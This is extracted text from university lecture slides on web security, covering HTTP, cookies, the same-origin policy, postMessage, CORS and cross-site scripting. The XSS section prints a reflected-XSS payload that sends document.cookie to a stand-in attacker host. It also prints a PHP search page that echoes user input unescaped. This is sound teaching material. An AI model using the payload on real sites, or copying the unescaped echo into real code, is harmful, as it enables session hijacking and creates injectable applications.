CSE343/443 Lehigh University Fall 2015 Web Security Presenter: Yinzhi Cao Slides Inherited and Modified from Prof. John Mitchell Reported Web Vulnerabilities "In the Wild" 1200 1000 800 Input Validation 600 CSRF XSS SQLi 400 200 0 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 Web application vulnerabilities Goals of web security Safely browse the web n Users should be able to visit a variety of web sites, without incurring harm: w No stolen information (without user’s permission) w Site A cannot compromise session at Site B Secure web applications n Applications delivered over the web should have the same security properties we require for stand- alone applications Network security Network Attacker System Intercepts and controls network communication Alice Web security System Web Attacker Sets up malicious site visited by victim; no control of network Alice Web Threat Models Web attacker n Control attacker.com n Can obtain SSL/TLS certificate for attacker.com n User visits attacker.com w Or: runs attacker’s Facebook app Network attacker n Passive: Wireless eavesdropper n Active: Evil router, DNS poisoning Malware attacker n Attacker escapes browser isolation mechanisms and run separately under control of OS Malware attacker Browsers (like any software) contain exploitable bugs n Often enable remote code execution by web sites n Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware on 18,000 web pages (URLs) Even if browsers were bug-free, still lots of vulnerabilities on the web n All of the vulnerabilities on previous graph: XSS, SQLi, CSRF, … Outline Background n Http n Cookies n Rendering content Isolation Communication Security Case Study n Cross-site scripting n Cross-site Request Forgery n Frame Navigation BACKGROUND HTTP URLs Global identifiers of network-retrievable documents Example: http://columbia.edu:81/class?name=E6121#homework Protocol Fragment Hostname Port Path Query Special characters are encoded as hex: n %0A = newline n %20 or + = space, %2B = + (special exception) HTTP Request Method File HTTP version Headers GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats Blank line Data – none for GET HTTP Response HTTP version Status code Reason phrase Headers HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Data Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set-Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> Cookies COOKIES: CLIENT STATE 15 Cookies Used to store state on user’s machine POST … Browser Server HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; If expires=NULL: expires = (when expires) ; this session only secure = (only over SSL) Browser POST … Server Cookie: NAME = VALUE HTTP is stateless protocol; cookies add state Cookie authentication Browser Web Server Auth server POST login.cgi Username & pwd Validate user Set-cookie: auth=val auth=val Store val GET restricted.html Cookie: auth=val restricted.html auth=val Check val If YES, YES/NO restricted.html RENDERING CONTENT Rendering Basic execution model n Each browser window or frame w Loads content w Renders n Processes HTML and scripts to display page n May involve images, subframes, etc. w Responds to events Document Object Model (DOM) Object-oriented interface used to read and write docs n web page in HTML is structured data n DOM provides representation of this hierarchy Examples n Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ] n Methods: document.write(document.referrer) Also Browser Object Model (BOM) n window, document, frames[], history, location, navigator (type and version of browser) Events Events can be n User actions: OnClick, OnMouseover n Rendering: OnLoad, OnBeforeUnload n Timing: setTimeout(), clearTimeout() Pages can embed content from many sources Frames: <iframe src=“//site.com/frame.html” > </iframe> Scripts: <script src=“//site.com/script.js” > </script> CSS: <link rel="stylesheet" type="text /css” href=“//site/com/theme.css" /> Objects (flash): [using swfobject.js script ] <script> var so = new SWFObject(‘//site.com/flash.swf', …); so.addParam(‘allowscriptaccess', ‘always'); so.write('flashdiv'); </script> ISOLATION Running Remote Code is Risky Integrity n Compromise your machine n Install malware rootkit n Transact on your accounts Confidentiality n Read your information n Steal passwords n Read your email 25 Frame and iFrame Window may contain frames from different sources n Frame: rigid division as part of frameset n iFrame: floating inline frame iFrame example <iframe src="hello.html" width=450 height=100> If you can see this, your browser doesn't understand IFRAME. </iframe> Why use frames? n Delegate screen area to content from another source n Browser provides isolation based on frames n Parent may work even if frame is broken Browser Sandbox Goal n Run remote web applications safely n Limited access to OS, network, and browser data Approach n Isolate sites in different security contexts n Browser manages resources, like an OS 27 Analogy Operating system Web browser Primitives Primitives n System calls n Document object model n Processes n Frames n Disk n Cookies / localStorage Principals: Users Principals: “Origins” n Discretionary access control n Mandatory access control Vulnerabilities Vulnerabilities n Buffer overflow n Cross-site scripting n Root exploit n Cross-site request forgery n Cache history attacks n … Policy Goals Safe to visit an evil web site Safe to visit two pages at the same time n Address bar distinguishes them Allow safe delegation Same Origin Policy Origin = protocol://host:port Site A Full access to same origin n Full network access n Read/write DOM n Storage Site A context Site A context COMMUNICATION Overview (4) Server-client in different origin Site A Site B (1) Server-client in the same origin Site A context Site A context Site B context (3) Client-client (2) Client-client in different origin in the same origin Server-client in the same origin Http with no restriction Client-client in the same origin Direct Access handle = window.open(“http://same- origin.org”); handle.contentDocument.getElementById(“m yDiv”); Windows Interact 35 Client-client in different origin postMessage document.domain window.postMessage An API for inter-frame communication n A network-like channel between frames Add a contact Share contacts postMessage syntax frames[0].postMessage("Attack at dawn!", "http://b.com/"); window.addEventListener("message", function (e) { if (e.origin == "http://a.com") { ... e.data ... } }, false); Attack at dawn! Facebook Anecdote Why include “targetOrigin”? What goes wrong? frames[0].postMessage("Attack at dawn!"); Messages sent to frames, not principals n When would this happen? 39 Domain Relaxation www.facebook.com chat.facebook.com www.facebook.comfacebook.com www.facebook.com chat.facebook.comfacebook.com Origin: scheme, host, (port), hasSetDomain Try document.domain = document.domain Server-client in different origin Library import CORS (cross origin resource sharing) in HTML5 Library import <script src=https://seal.verisign.com/getseal? host_name=a.com></script> VeriSign • Script has privileges of imported page, NOT source server. • Can script other pages in this origin, load more scripts • Other forms of importing CORS Cross-origin network requests Access-Control-Allow-Origin: <list of domains> Access-Control-Allow-Origin: * Cross Site Scripting (XSS) What is XSS? An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application Methods for injecting malicious code: n Reflected XSS (“type 1”) w the attack script is reflected back to the user as part of a page from the victim site n Stored XSS (“type 2”) w the attacker stores the malicious code in a resource managed by the web application, such as a database n Others, such as DOM-based attacks Taxonomy of XSS Attacks Basic scenario: reflected XSS attack Attack Server 1 visit web site 2 receive malicious link 5 send valuable data 3 click on link Victim client 4 echo user input Victim Server XSS example: vulnerable site search field on victim.com: n http://victim.com/search.php ? term = apple Server-side implementation of search.php: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term] ?> : . </BODY> </HTML> echo search term into response Bad input Consider link: (properly URL encoded) http://victim.com/search.php ? term = <script> window.open( “http://badguy.com?cookie = ” + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> … </script> 3. Browser executes script: w Sends badguy.com cookie for victim.com Attack Server user gets bad link www.attacker.com http://victim.com/search.php ? term = <script> ... </script> user clicks on link Victim client victim echoes user input Victim Server www.victim.com <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script> </html> Basic scenario: reflected XSS attack Attack Server Email version addr 1 Collect email 2 send malicious email 5 send valuable data 3 click on link User Victim 4 echo user input Server Victim 2006 Example